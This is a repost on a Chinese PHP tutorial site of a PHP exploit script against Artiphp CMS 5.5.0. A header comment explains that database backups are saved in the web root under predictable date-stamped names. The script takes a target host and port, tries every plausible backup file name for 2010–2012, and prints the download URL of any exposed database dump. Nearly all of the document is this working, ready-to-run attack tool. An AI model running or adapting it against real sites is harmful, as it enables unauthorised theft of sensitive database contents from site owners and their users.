来源:自学PHP网 时间:2015-04-17 14:11 作者: 阅读:次
[导读] ?php/*Artiphp CMS 5.5.0 Database Backup Disclosure Exploit作者: Artiphp www.2cto.com http://www.artiphp.com影响版本: 5.5.0 Neo (r422)Summary: Artiphp is a content management sys......
<?php
/* Artiphp CMS 5.5.0 Database Backup Disclosure Exploit 作者: Artiphp www.2cto.com http://www.artiphp.com 影响版本: 5.5.0 Neo (r422) Summary: Artiphp is a content management system (CMS) open and free to create and manage your website. 描述: Artiphp stores database backups using backupDB() utility with a predictable file name inside the web root, which can be exploited to disclose sensitive information by downloading the file. The backup is located in '/artzone/artpublic/database/' directory as 'db_backup_[type].[yyyy-mm-dd].sql.gz' filename. 测试平台: Microsoft Windows XP Professional SP3 (EN) Apache 2.2.21 PHP 5.3.8 / 5.3.9 MySQL 5.5.20 Gjoko 'LiquidWorm' Krstic @zeroscience发现的本漏洞 */ error_reporting(0); print "\no==========================================================o\n"; print "| |"; print "\n|\tArtiphp CMS 5.5.0 DB Backup Disclosure Exploit |\n"; print "| |\n"; print "|\t\t\tby LiquidWorm |\n"; print "| |"; print "\no==========================================================o\n"; if ($argc < 3) { print "\n\n\x20[*] Usage: php $argv[0] <host> <port>\n\n\n"; die(); } $godina_array = array('2012','2011','2010'); $mesec_array = array('12','11','10','09', '08','07','06','05', '04','03','02','01'); $dn_array = array('31','30','29','28','27','26', '25','24','23','22','21','20', '19','18','17','16','15','14', '13','12','11','10','09','08', '07','06','05','04','03','02', '01'); $backup_array = array('full','structure','partial'); $host = $argv[1]; $port = intval($argv[2]); $path = "/artiphp/artzone/artpublic/database/"; // www.2cto.com change per need. $alert1 = "\033[0;31m"; $alert2 = "\033[0;37m"; foreach($godina_array as $godina) { print "\n\n\x20[*] Checking year: ".$godina."\n\n Scanning: "; sleep(2); foreach($mesec_array as $mesec) { foreach($dn_array as $dn) { print "~"; foreach($backup_array as $backup) { if(file_get_contents("http://".$host.":".$port.$path."db_backup_".$backup.".".$godina."-".$mesec."-".$dn.".sql.gz")) { print "\n\n\x20[!] DB backup file discovered!\n\n"; echo $alert1; print "\x20==>\x20"; echo $alert2; die("http://".$host.":".$port.$path."db_backup_".$backup.".".$godina."-".$mesec."-".$dn.".sql.gz\n"); } } } } } print "\n\n\x20[*] Zero findings.\n\n\n" ?> |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com